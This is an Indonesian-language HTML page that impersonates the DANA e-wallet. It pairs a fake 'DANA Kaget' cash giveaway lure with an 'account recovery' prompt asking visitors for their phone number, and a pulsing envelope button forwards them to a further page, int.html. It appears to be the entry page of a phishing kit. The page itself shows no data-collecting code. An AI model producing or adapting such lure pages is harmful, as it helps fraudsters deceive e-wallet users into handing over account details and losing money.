
<!DOCTYPE html>
<html>
    <head>
        <title>pemulihan akun dana</title>
        <meta data-n-head="ssr" data-hid="og:image" property="og:image" content="https://i.ibb.co/VgR9JVf/images-20.jpg">
        <meta charset="UTF-8">
        <meta name="description" content="DANA Kaget Cuma buat kamu yang paling gesit! Sikat sekarang!">
        <meta name="keywords" content="dana, danakaget, receh, uang">
        <link rel="icon" type="image/x-icon" href="./../assets/img/favicon/favicon.ico">
        <link rel="apple-touch-icon" sizes="180x180" href="./../assets/img/favicon/apple-touch-icon.png">
        <link rel="icon" type="image/png" sizes="32x32" href="./../assets/img/favicon/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="./../assets/img/favicon/favicon-16x16.png">
        <link rel="manifest" href="./../assets/img/favicon/site.webmanifest">
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
        <link rel="stylesheet" type="text/css" href="./../lib/style/kaget.css">
        <style>
            .amplop {
                animation: pulse 2s infinite;
            }

            @keyframes pulse {
                0% {
                    transform: scale(1);
                }
                50% {
                    transform: scale(1.2);
                }
                100% {
                    transform: scale(1);
                }
            }
        </style>
    </head>
    <body>
        <div class="dana_index">
            <div class="head">
                <h2 class="dana_logo2"></h2>
            </div>
            <div class="dana_logo"></div>
            <h1 class="part"><center>silahkan masukan nomor untuk membantu pemulihan akun dana</center></h1>
            <button onclick="window.location.href='./../int.html'">
                <img class="amplop" src="./../assets/img/event.png">
            </button>
        </div>
        <style>
            .dana_logo {
                width: 90px;
                height: 90px;
                background: url("../assets/img/dana-logo.fe46647.png") no-repeat center center / contain;
            }

            .dana_logo2 {
                width: 100px;
                height: 100px;
                background: url("../assets/img/dana-logo.fe46647.png") no-repeat center center / contain;
            }
        </style>
    </body>
</html>

